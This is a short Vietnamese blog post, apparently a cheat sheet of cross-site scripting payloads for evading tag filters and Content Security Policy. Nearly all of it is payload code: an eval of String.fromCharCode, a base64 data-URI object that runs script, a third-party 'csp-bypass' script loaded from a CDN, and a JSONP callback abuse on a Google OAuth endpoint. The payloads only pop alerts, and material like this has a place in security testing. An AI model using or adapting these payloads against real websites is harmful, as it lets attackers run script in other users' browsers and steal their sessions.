Đừng chú ý vào các tag, nó chỉ hỗ trợ 1 phần, ngoài ra còn có thể sử dụng các hàm như eval() của js để thực hiện, cộng chuỗi thêm bớt mảng,...
eval(String.fromCharCode(97,108,101,114,116,40,49,41,))
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgyKTwvc2NyaXB0Pg==">
<script src="https://unpkg.com/react@16.7.0/umd/react.production.min.js"></script>
<script src="https://unpkg.com/csp-bypass@1.0.2/dist/sval-classic.js"></script>
<br csp="alert(1)">
<script%20src="https://accounts.google.com/o/oauth2/revoke?callback=alert(31337)"></script>
https://html.com/character-codes/
Nhận xét
Đăng nhận xét